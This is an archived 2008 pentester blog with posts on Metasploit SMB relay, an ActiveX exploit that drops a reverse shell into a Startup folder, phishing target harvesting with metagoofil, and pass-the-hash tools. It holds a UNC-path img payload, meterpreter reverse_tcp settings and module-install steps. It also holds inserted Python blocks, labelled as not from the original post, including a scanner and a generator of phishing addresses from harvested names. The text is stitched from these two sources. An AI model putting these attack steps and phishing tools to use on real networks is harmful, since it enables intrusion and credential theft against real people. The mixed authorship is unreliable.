Thursday, July 31, 2008
Blackhat USA 2008 Fantasy League Picks
Because I'm poor and my company is cheap, I'm not making it to BH, but Wesley McGrew and I have decided to do our fantasy picks.
So here is the order I plan to pirate the BH videos in...
Day 1
10:00 - 11:00 Nmap: Scanning the Internet
11:15 - 12:30 Dan's talk will probably be too crowded so... Jinx: Malware 2.0
13:45 - 15:00 dunno....
15:15 - 16:30 Malware Analysis
16:45 - 18:00 Meta-Post Exploitation **anything by Val Smith will be good
Day 2
10:00 - 11:00 Encoded, Layered and Transcoded Syntax Attacks: Threading the Needle Past Web Application Security
11:15 - 12:30 Circumventing Automated JavaScript Analysis Tools
13:45 - 15:00 Hacking and Injecting Federal Trojans
15:15 - 16:30 Most likely Jeremiah Grossman's talk or continue with Hacking and Injecting Federal Trojans
16:45 - 18:00 Pushing the Camel Through the Eye of a Needle or Methods for Understanding Targeted Attacks with Office Document
Tuesday, July 29, 2008
It's not nmap but it gets the job done -- portqry
C:\>portqry -n server1.company.com -e 3389
Querying target system called:
server1.company.com
Attempting to resolve name to IP address...
Name resolved to 10.1.1.1
querying...
TCP port 3389 (unknown service): LISTENING
Checking out the KB article on portqry will give you some of its more useful features.
One fun option is its ability to send a default LDAP query (a rootDSE read, so no credentials needed) to a directory server:
portqry -n myserver -p udp -e 389
UDP port 389 (unknown service): LISTENING or FILTERED
Sending LDAP query to UDP port 389...
LDAP query response:
currentdate: 12/13/2003 05:42:40 (unadjusted GMT)
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=domain,DC=example,DC=com
dsServiceName: CN=NTDS Settings,CN=myserver,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=domain,DC=example,DC=com
namingContexts: DC=domain,DC=example,DC=com
defaultNamingContext: DC=domain,DC=example,DC=com
schemaNamingContext: CN=Schema,CN=Configuration,DC=domain,DC=example,DC=com
configurationNamingContext: CN=Configuration,DC=domain,DC=example,DC=com
rootDomainNamingContext: DC=domain,DC=example,DC=com
supportedControl: 1.2.840.113556.1.4.319
supportedLDAPVersion: 3
supportedLDAPPolicies: MaxPoolThreads
highestCommittedUSN: 4259431
supportedSASLMechanisms: GSSAPI
dnsHostName: myserver.domain.example.com
ldapServiceName: domain.example.com:myserver$@domain.EXAMPLE.COM
serverName: CN=myserver,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=domain,DC=example,DC=com
supportedCapabilities: 1.2.840.113556.1.4.800
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 0
forestFunctionality: 0
domainControllerFunctionality: 2
======== End of LDAP query response ========
UDP port 389 is LISTENING
and "SQL pings" against the SQL Server Browser service on UDP 1434, which hands back every instance on the box along with its listening port and named pipe:
portqry -n 192.168.1.20 -e 1434 -p udp
You receive the following output:
Querying target system called:
192.168.1.20
querying...
UDP port 1434 (ms-sql-m service): LISTENING or FILTERED
Sending SQL Server query to UDP port 1434...
Server's response:
ServerName SQL-Server1
InstanceName MSSQLSERVER
IsClustered No
Version 8.00.194
tcp 1433
np \\SQL-Server1\pipe\sql\query
==== End of SQL Server query response ====
UDP port 1434 is LISTENING
It also does SNMP queries, ISA Server queries and, evidently, RPC endpoint mapper queries as well.
There are other fun features, and the -local options (what's listening locally and which process owns it) are worth looking into as well.
Some of the not-so-fun stuff: no randomizing ports (you can do an ordered list or ranges, but no random), and ONLY ONE HOST AT A TIME :-( ...but that's what batch files are for.
If anyone else is using this for pentests please let me know your thoughts.
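To show what portqry is actually doing on the "SQL ping" above, here is an added example (mine, not portqry's code and not from the original post) that speaks the SQL Server Resolution Protocol directly. Per MS-SQLR the client sends a single CLNT_UCAST_EX byte (0x03) to UDP 1434 and the Browser service answers with SVR_RESP: 0x05, a little-endian 16-bit length, then a semicolon-separated "key;value;...;;" string with one record per instance. The sample datagram at the bottom is constructed from the SQL-Server1 output shown above, not a real capture, and because this takes a host list it also works around portqry's one-host-at-a-time limitation.

```python
"""SQL Server Browser (UDP 1434) "ping", the same probe portqry -e 1434 -p udp sends.

Wire format is MS-SQLR: send one CLNT_UCAST_EX byte (0x03); the Browser service
answers with SVR_RESP: 0x05, a little-endian uint16 length, then a
semicolon-separated 'key;value;...;;' string, one record per instance.
"""
from __future__ import annotations

import socket
import struct
import sys

CLNT_UCAST_EX = 0x03
SVR_RESP = 0x05
SSRP_PORT = 1434


def build_request() -> bytes:
    """One byte asks the Browser service to list every instance on the host."""
    return bytes([CLNT_UCAST_EX])


def parse_response(datagram: bytes) -> list[dict[str, str]]:
    """Turn an SVR_RESP datagram into one {key: value} dict per instance."""
    if len(datagram) < 3 or datagram[0] != SVR_RESP:
        raise ValueError("not a SQL Server Browser SVR_RESP datagram")
    (length,) = struct.unpack_from("<H", datagram, 1)
    body = datagram[3:3 + length].decode("ascii", errors="replace")
    instances = []
    for record in body.split(";;"):          # ';;' terminates each instance record
        fields = record.split(";")
        if len(fields) < 2:
            continue                         # trailing empty chunk after the last ';;'
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def sql_ping(host: str, timeout: float = 2.0) -> list[dict[str, str]]:
    """Send the request and parse the reply; empty list on timeout (filtered, or no Browser service)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_request(), (host, SSRP_PORT))
        try:
            data, _ = sock.recvfrom(65535)
        except socket.timeout:
            return []
    return parse_response(data)


# Constructed sample datagram, built from the instance shown in the portqry output
# above (SQL-Server1 / MSSQLSERVER / 8.00.194); not a real capture.
_SAMPLE_BODY = (
    b"ServerName;SQL-Server1;InstanceName;MSSQLSERVER;IsClustered;No;"
    b"Version;8.00.194;tcp;1433;np;\\\\SQL-Server1\\pipe\\sql\\query;;"
)
SAMPLE_RESPONSE = bytes([SVR_RESP]) + struct.pack("<H", len(_SAMPLE_BODY)) + _SAMPLE_BODY


if __name__ == "__main__":
    # Unlike portqry, take as many hosts as you like on the command line.
    for target in sys.argv[1:]:
        for inst in sql_ping(target):
            print(target, inst.get("InstanceName"), inst.get("Version"), inst.get("tcp"))
```

The "tcp" value is the one you care about on a pentest: it is the port a named instance actually listens on, which is usually not 1433, and the Browser service will tell anyone who asks.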
Additional information on metacab: http://www.phx2600.org/forum/viewtopic.php?t=951&start=0
Monday, July 28, 2008
Passed My CISA
ph33r me!
I'll pass on the certification hating, see my posts on CEH != competent pentester and CISSP != competent pentester...pretty much the same feelings on this one.
*edit
Looks like I had already done a CISA post...so I'll still spare you the hatin'.
Sunday, July 27, 2008
The Importance Of Internal Monitoring
Second try. I had 2 class B's to look at so I took one of the shells from the snapshot viewer exploit and had it ping .0 of every class C in the network range. Whatever replied I took as a "good" subnet and if it didn't I marked it as not having anything listening and removed it from subsequent scans. Did I miss some boxes? Probably...didn't matter in this case.
Armed with my new ranges, minus off limit ones and dead ones, I started a new nmap scan looking for just a few ports that I had exploits for and let it roll at a blistering T2 pace. It did its thing and finished like 40 hours later and then I did my thing trying to do some manual enumeration and exploitation.
I upped the intensity as the week went on and never had any other trouble or any of my "worker bees" taken off line for misbehaving. So all was good.
At the outbrief it was determined that I had found a fatal flaw in their system: there was no internal IDS monitoring for suspicious activity on the LAN. Had there been, I probably would have been seen again, but they had figured that anyone getting into the network would make the same mistake I had made the first time and scan or try to exploit unused networks, and they would catch them there. I lucked out that 1) my ping sweep wasn't logged (it should have been) or wasn't noticed after the fact, and 2) I had more than one box on the LAN...I figured it was 50/50 that I would get seen with the ping sweep, and worst case it would lead back to one of their boxes and not mine.
So what's the point? You need something watching your internal network, even if it's only for the straight-up blatant shit that could be happening. Had something been in place they would have definitely caught the later port scans, enumeration, and exploit attempts.
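As an added example of the "straight-up blatant" detection the post is arguing for (mine, not anything the client had or the author ran): the ping sweep described above hits the .0 address of a long run of /24s from one source in a short time, and either property is enough to alert on. The log format below is assumed (one ICMP echo-request per line with an ISO timestamp, src and dst), and the sample lines are constructed for the example; swap the regex for whatever your firewall or IDS actually emits.

```python
"""Flag ping sweeps in ICMP logs: a source that touches many distinct /24s in a
short window, and a source that pings network (.0) addresses at all."""
from __future__ import annotations

import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format (constructed for this example, not any particular product):
#   <ISO timestamp> ICMP echo-request src=<ip> dst=<ip>
LOG_RE = re.compile(r"^(?P<ts>\S+) ICMP echo-request src=(?P<src>\S+) dst=(?P<dst>\S+)$")


def parse(lines):
    """Yield (timestamp, src, dst) for every line that matches; skip the rest."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            yield (datetime.fromisoformat(m["ts"]),
                   ipaddress.ip_address(m["src"]),
                   ipaddress.ip_address(m["dst"]))


def find_sweepers(lines, min_subnets=8, window=timedelta(minutes=5)):
    """Return {src: most distinct /24s hit inside any `window`} for sources over the threshold."""
    by_src = defaultdict(list)
    for ts, src, dst in sorted(parse(lines), key=lambda e: e[0]):
        by_src[str(src)].append((ts, ipaddress.ip_network(f"{dst}/24", strict=False)))
    hits = {}
    for src, events in by_src.items():
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:   # slide the window forward
                start += 1
            distinct = len({net for _, net in events[start:end + 1]})
            if distinct >= min_subnets:
                hits[src] = max(hits.get(src, 0), distinct)
    return hits


def dot_zero_probes(lines):
    """Count, per source, echo requests aimed at a /24's network address (x.y.z.0).
    Nothing legitimate pings .0 of every subnet, so one alert per line is justified."""
    counts = defaultdict(int)
    for _, src, dst in parse(lines):
        if dst == ipaddress.ip_network(f"{dst}/24", strict=False).network_address:
            counts[str(src)] += 1
    return dict(counts)


# Constructed sample: one foothold box sweeping .0 of twelve /24s in twelve seconds,
# plus a normal workstation pinging its gateway twice, plus a line that must be ignored.
SAMPLE_LOG = [
    f"2008-07-27T02:11:{i:02d} ICMP echo-request src=10.5.5.23 dst=10.1.{i}.0"
    for i in range(12)
] + [
    "2008-07-27T02:11:03 ICMP echo-request src=10.1.4.17 dst=10.1.4.1",
    "2008-07-27T02:15:40 ICMP echo-request src=10.1.4.17 dst=10.1.4.1",
    "garbage line the parser must ignore",
]

if __name__ == "__main__":
    print("sweepers:", find_sweepers(SAMPLE_LOG))
    print(".0 probes:", dot_zero_probes(SAMPLE_LOG))
```

The threshold and window are the knobs you tune against your own baseline; the point is that a box on the LAN hitting a dozen subnets in seconds is not something a workstation does, regardless of whether those subnets are in use.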
Friday, July 25, 2008
It's the end of the world as we know it...and I feel fine
Every time there is a new vulnerability WITHOUT code, everyone wants to debate and bitch about the "real impact" because there is no exploit code. But as soon as exploit code comes out, all the bloggers and security people get to do the "Patch Now!" post. So, if the vulnerability is indeed as serious as people say it is...you should all be kissing HD's and I)ruid's asses for throwing out the ammunition to get the serious vulnerability patched in a hurry.
Is the average fresh CEH graduate script kiddie going to pwn the internet with this aux module? Hell no. After they get a domain poisoned, they still have to launch some sort of client side attack, deliver some malware that won't get flagged by AV, secure the box, and manage all the bots. Is that realistic for the average "script kiddie"? I don't think so.
Maybe a real bad guy can make that happen, but to think that "real bad guys" didn't already have this exploit after all the talk about it is just plain asinine.
I'm personally glad I have at least another quarter of job security; this kind of fear mongering is always great for job security and buying new toys.
**edit
Richard Bejtlich wrote up a similar but better response to the issue: http://taosecurity.blogspot.com/2008/07/dns-and-cyber-tardis-problem.html
**edit #2
Good writeup on the verizon security blog about the issue and possible scenarios.
http://securityblog.verizonbusiness.com/2008/07/25/dns-exploits-what-could-actually-happen/
Thursday, July 24, 2008
More On Leveraging Client-Side Exploits In Your Pentests--smb relay
I, on the other hand, always seem to have to work for it. In addition to my little snapshotviewer code (previous post) I threw in an smb_relay attack via Metasploit. This was to see if I could get lucky and catch some users doing the wrong thing, like browsing the net or clicking on links in emails with admin credentials, and to leverage the foothold we had gained through weak physical security (I now had a box on the local network).
If you're unfamiliar with the exploit itself, here's the info from the module:
Description:
This module will relay SMB authentication requests to another host, gaining access to an authenticated SMB session if successful. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate. Unfortunately, this module is not able to clean up after itself. The service and payload file listed in the output will need to be manually removed after access has been gained. The service created by this tool uses a randomly chosen name and description, so the services list can become cluttered after repeated exploitation. The SMB authentication relay attack was first reported by Sir Dystic on March 31st, 2001 at @lanta.con in Atlanta, Georgia.
References:
http://en.wikipedia.org/wiki/SMBRelay
http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx
http://www.xfocus.net/articles/200305/smbrelay.html
Simple enough to execute: start msf as root (needed to bind to TCP 139), select a payload, embed a UNC reference pointing at your box in an email or web page, send the email, cross fingers and wait.
The last post asked for code, so here you go:
<img src="\\networkIP\share\1.gif">
yep, that's some l33t shit right there...
For those of you that are more visual learners, I did a video last year for chicagocon as a demo here --smb_relay with reverse shell.
Issues, and there were some.
1. Most users won't have the permissions to actually create a service and run your payload; that's OK, that's what the ActiveX attack was for.
2. It's messy: it leaves registry keys and executables on the box that "someone" will have to clean up.
3. My initial payload was a download and execute, which was supposed to grab the same .exe I was serving up for the ActiveX bug, for whatever reason that wasn't working (don't know why yet) so after a few failed attempts I switched to meterpreter payload. That led to issue 4.
4. With the way the exploit works it creates and calls a service; evidently there are issues with this because the service won't correctly respond to Windows (status, start, stop), so Windows kills it after a period of time. Around 60 seconds for me. That's a bummer. More info here
The Fix: Thankfully there is a fix, but I found out about it after the fact. Once you select meterpreter as your payload you get an AutoRunScript option.
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb_relay) > show advanced
Module advanced options:
Payload advanced options (windows/meterpreter/reverse_tcp):
Name : AutoLoadStdapi
Current Setting: true
Description : Automatically load the Stdapi extension
Name : AutoRunScript
Current Setting:
Description : Script to autorun on meterpreter session creation
migrate.rb, located in your meterpreter scripts directory, will migrate to lsass by default; this should solve the shell-dying-on-you problem. I haven't tested it, but someone I trust told me it should solve the problem.
The patch in the above Framework-Hackers post may work as well; I haven't tried that either.
5. After meterpreter not working I moved to the ol' standby of reverse shells, which were stable and stuck around until I did what I needed to do and killed the session.
I didn't get as lucky as g0ne. Turned out that several admins had added their domain user account to the local admin group on their workstation, so while it allowed the exploit to succeed I didn't get any shells with (domain) elevated privs. :-(
It's still a useful (internal) attack vector: combine smb_relay with now (most likely) being able to point any subdomain at an IP of your choosing via the new bailiwicked Metasploit auxiliary modules, and you can probably pull off a pretty good hack if you have local network access. Gotta love exploitable "features."
Wednesday, July 23, 2008
Leveraging Client-Side Exploits In Your Pentests
This one is nice because it's an auto-download exploit. You call the ActiveX control and it downloads the file you specify to the location you specify. This is a great exploit from a user-training perspective because you can make the binary as benign or as dangerous as you want. I of course shoved a reverse shell out over FBP (firewall bypass protocol, aka TCP 443).
Delivery is simple enough: you create an email with a link (see my metagoofil post if you need help gathering those emails) and ask politely for users with elevated permissions on the network to click on it. You embed the snapshot viewer code in that page, point the download location to somewhere fun like All Users/Startup, and tail -f /apache/access.log to see who browses the site, who enables the ActiveX control (your users do know better, right? or you do have your default IE settings set high, right?) and who downloads your binary. If all goes well, after lunch you'll have your shell :-)
POC code from secfocus: http://downloads.securityfocus.com/vulnerabilities/exploits/30114.html
Sunday, July 20, 2008
Adding your own exploits and modules in Metasploit
In Linux (for the love of god, don't run msf on Windows), when you install Metasploit 3.x you get a hidden .msf3 directory (/home/$user/.msf3) in your home directory.
It starts out empty, but this is where you want to place all updated exploit modules, auxiliary modules, meterpreter scripts, etc.
Why? Well, if you start modifying exploits in the trunk, then when you do an update it will start bitching at you about it not being the same exploit and may possibly overwrite your stuff, and that's no fun.
Example time.
Say you want to add the "HP StorageWorks NSI Double Take Remote Overflow Exploit (meta)" exploit located on milw0rm. It's already in the trunk, so if you want to follow along you'll have to rm it.
What you have to do is create the same directory structure in your .msf3 folder as you have in your regular msf folder. So, looking at the exploit on milw0rm we see the class (and therefore the path) is:
class Exploits::Windows::Misc::Doubletake
So we cd into our .msf3 folder and create our modules folder (if you are lost, look at your regular msf folder and make a similar directory structure). Once we do that we need to create an exploits folder, a windows folder, and a misc folder. Then we'll stick our doubletake.rb file into that folder.
cg@segfault:~/.msf3$ mkdir modules
cg@segfault:~/.msf3$ cd modules/
cg@segfault:~/.msf3/modules$ mkdir exploits
cg@segfault:~/.msf3/modules$ cd exploits/
cg@segfault:~/.msf3/modules/exploits$ mkdir windows
cg@segfault:~/.msf3/modules/exploits$ cd windows/
cg@segfault:~/.msf3/modules/exploits/windows$ mkdir misc
cg@segfault:~/.msf3/modules/exploits/windows$ cd misc
cg@segfault:~/.msf3/modules/exploits/windows/misc$ ls -l
total 4
-rw-r--r-- 1 cg cg 2277 2008-07-20 12:22 doubletake.rb
You don't need to mirror the directory structure completely, just add what you are adding. If you had Linux exploits you would add a linux folder in the exploits folder; since we don't, it's not necessary.
If everything worked right, when you start the console you'll see one more exploit and you'll now be able to use that exploit in the framework.
Before:
=[ msf v3.2-release
+ -- --=[ 302 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 73 aux
After:
=[ msf v3.2-release
+ -- --=[ 303 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 73 aux
Now we can use the exploit.
msf > use exploit/windows/misc/doubletake
msf exploit(doubletake) > info
Name: doubletake Overflow
Version: 9
Platform: Windows
Privileged: No
License: Metasploit Framework License
Provided by:
ri0t
Available targets:
Id Name
-- ----
0 doubletake 4.5.0
1 doubletake 4.4.2
2 doubletake 4.5.0.1819
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 1100 yes The target port
Payload information:
Space: 500
Avoid: 1 characters
Description:
This Module Exploits a stack overflow in the authentication
mechanism of NSI Doubletake which is also rebranded as hp storage
works Vulnerability found by Titon of Bastard Labs.
msf exploit(doubletake) >
Same thing goes for auxiliary modules: just make an auxiliary folder in the modules directory and populate it accordingly. Pretty much the same thing for meterpreter scripts, except the scripts aren't in the modules directory, they are in their own, so in this case we'd make our scripts/meterpreter directories in the main .msf3 directory.
Thursday, July 17, 2008
Lack of usable emails for your pentest got you down...metagoofil FTW!
So there I was, trying to gather emails for our pentest. The only problem is that we were doing an assessment of city.domain.com but all the emails are listed as @domain.com. Just for clarification, searching domain.com for email addresses wouldn't necessarily give me emails that were in scope, so I had to think of something.
First step was some google-fu of "site:city.domain.com + @domain.com", which brought in a few email addresses. Next step was metagoofil. Metagoofil is awesome because it will download MS Office, OpenOffice, and PDF documents from the domain you specify. It will parse the metadata and give you a list of the usernames in the documents and the path where each document was saved.
How it works (images from the Edge-Security site)
It downloads the documents to your local computer so you can view them for extra info gathering. It also gives you a nice little HTML page with the results.
After that I took the possible usernames, put them in the proper naming convention for the domain, rocketed off my SE email and crossed my fingers.
The result? Metagoofil for the win! Overall I had about 160 possible email addresses, 20 actually made it to someone's inbox...sad face but not bad considering how I got the possibles.
5 of the 20 opened it :-)
2 were forwarded (meaning the user that opened it was not initially emailed), 1 was from google, and 2 of the 5 were from metagoofil :-)
Not bad if you ask me.
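The step between the metagoofil output and the SE email is "put them in the proper naming convention for the domain", and that is the part worth automating. Here is an added example (mine, not metagoofil's code and not from the original post) that learns the convention from the handful of real addresses the google search turned up and then generates candidates for every name metagoofil pulled out of the metadata; names it cannot split into first and last (a bare "jsmith") are passed through as-is, since those often already are the local part. The conventions table and the sample names are my constructions.

```python
"""Turn names harvested from document metadata into addresses under the target
domain's naming convention, learned from the few real addresses you already have."""
from __future__ import annotations

import re

# Common corporate conventions; the key is only a label for reporting.
CONVENTIONS = {
    "first.last": lambda f, l: f"{f}.{l}",
    "flast":      lambda f, l: f"{f[0]}{l}",
    "firstl":     lambda f, l: f"{f}{l[0]}",
    "first_last": lambda f, l: f"{f}_{l}",
    "firstlast":  lambda f, l: f"{f}{l}",
    "lastf":      lambda f, l: f"{l}{f[0]}",
    "first":      lambda f, l: f,
}


def split_name(name: str) -> tuple[str, str] | None:
    """'John Smith' / 'Smith, Mary' -> ('john', 'smith'); a bare username like 'jsmith' -> None."""
    name = re.sub(r"[^A-Za-z ,]", "", name).strip()
    if "," in name:
        last, first = [p.strip() for p in name.split(",", 1)]
    else:
        parts = name.split()
        if len(parts) < 2:
            return None
        first, last = parts[0], parts[-1]
    return first.lower(), last.lower()


def _local_part(label: str, name: str) -> str | None:
    parts = split_name(name)
    return None if parts is None else CONVENTIONS[label](*parts)


def infer_convention(known: list[tuple[str, str]]) -> str | None:
    """Given (full name, real address) pairs, return the label every pair fits, else None."""
    for label in CONVENTIONS:
        if known and all(_local_part(label, n) == a.split("@")[0].lower() for n, a in known):
            return label
    return None


def candidates(names: list[str], domain: str, convention: str | None = None) -> list[str]:
    """Addresses to try. With a known convention, one per full name; without one, all of them.
    Names that are not 'First Last' are passed through as a local part after cleanup."""
    labels = [convention] if convention else list(CONVENTIONS)
    out = set()
    for name in names:
        parts = split_name(name)
        if parts is None:
            local = re.sub(r"[^a-z0-9._-]", "", name.lower())
            if local:
                out.add(f"{local}@{domain}")
            continue
        for label in labels:
            out.add(f"{CONVENTIONS[label](*parts)}@{domain}")
    return sorted(out)


# Constructed sample input: what google gave us (name + confirmed address) and what
# metagoofil pulled from document metadata.
KNOWN = [("Jane Doe", "jdoe@domain.com"), ("Bob Jones", "BJones@domain.com")]
HARVESTED = ["John Smith", "Smith, Mary", "jsmith", "Administrator"]

if __name__ == "__main__":
    conv = infer_convention(KNOWN)
    print("convention:", conv)
    print(*candidates(HARVESTED, "domain.com", conv), sep="\n")
```

When no convention can be inferred, candidates() falls back to generating every form, which is what costs you bounces (the 160-sent / 20-delivered ratio above); with even two confirmed addresses the list collapses to one guess per name.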
Tuesday, July 15, 2008
McCain Can't Use the Internet
http://blog.wired.com/27bstroke6/2008/07/mccain-says-hes.html
How the F is someone that can't even get online supposed to be able to make good decisions for our country about all the different issues that come up with regard to the internet, privacy, security, etc.?
Thursday, July 3, 2008
Maltego for Information Gathering Part I
http://www.ethicalhacker.net/content/view/202/24/
"According to their web site, "Paterva invents and sells unique data manipulation software. Paterva is headed by Roelof Temmingh who is leading a light and lethal team of talented software developers." On May 6 2008, they released a new version of a very kewl tool named Maltego.
"Maltego is an open source intelligence and forensics application. It allows for the mining and gathering of information as well as the representation of this information in a meaningful way. Coupled with its graphing libraries, Maltego allows you to identify key relationships between information and identify previously unknown relationships between them. It is a must-have tool in the forensics, security and intelligence fields!"
Chris Gates' talk at ChicagoCon 2008 entitled "New School Information Gathering" touched on many tools and techniques. One of the tools he introduced to the audience is Maltego v2. This first in a two part series expands on this new tool with a basic introduction to Maltego followed by step-by-step personal recon tutorials. Part II will focus on infrastructure enumeration with Maltego."
Wednesday, July 2, 2008
Why would you tell the world when you go on vacation?
No link this time, but it's a recent post.
DeepSec 2007 talks are on google video
http://video.google.com/videosearch?q=deepsec&sitesearch=#
24th CCC talks are also available:
http://events.ccc.de/congress/2007/Fahrplan/events.en.html
'I've Got Nothing to Hide' and Other Misunderstandings of Privacy Paper
From the abstract:
" In this short essay, written for a symposium in the San Diego Law Review, Professor Daniel Solove examines the nothing to hide argument. When asked about government surveillance and data mining, many people respond by declaring: "I've got nothing to hide." According to the nothing to hide argument, there is no threat to privacy unless the government uncovers unlawful activity, in which case a person has no legitimate justification to claim that it remain private. The nothing to hide argument and its variants are quite prevalent, and thus are worth addressing. In this essay, Solove critiques the nothing to hide argument and exposes its faulty underpinnings."
http://papers.ssrn.com/sol3/papers.cfm?abstract_id=998565#PaperDownload
Pass The Hash Toolkit v1.4 released
from the full disclosure announcement:
Source Code:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4-src.tgz
Win32 Binaries:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4.tgz
Documentation/info:
http://oss.coresecurity.com/projects/pshtoolkit.htm
http://oss.coresecurity.com/pshtoolkit/doc/index.html
http://hexale.blogspot.com
http://www.hexale.org/forums
What's new?:
(http://oss.coresecurity.com/pshtoolkit/release/1.4/WHATSNEW)
*Support for XP SP 3 for whosthere/iam (whosthere-alt/iam-alt work on xp sp3
without requiring any update)
*New -t switch for whosthere/whosthere-alt: establishes interval used
by the -i switch (by default 2 seconds).
*New -a switch for whosthere/iam: specify addresses to use. Format:
ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESSIONLIST_COUNT_ADDR
(WARNING!: if you use the wrong values the system may crash)
The idea is that, if you find yourself in a version of Windows where
whosthere/iam don't work (and iam-alt/whosthere-alt don't work
either); you can run LSASRV.DLL thru IDA, run the PASSTHEHASH.IDC
script included in the Pass-The-Hash toolkit, and use the addresses
found by the script with the -a switch.
This basically allows you to specify addresses at runtime to whosthere without
the need to recompile the tool.
*New -r switch for iam/iam-alt: Create a new logon session and run a
command with the specified credentials (e.g.: -r cmd.exe)
*genhash now outputs hashes using the LM HASH:NT HASH format
*several bugfixes and stuff
---
Between winexe, msf psexec, token stealing, and the Pass-The-Hash toolkit, you'll never have to crack another password ever again.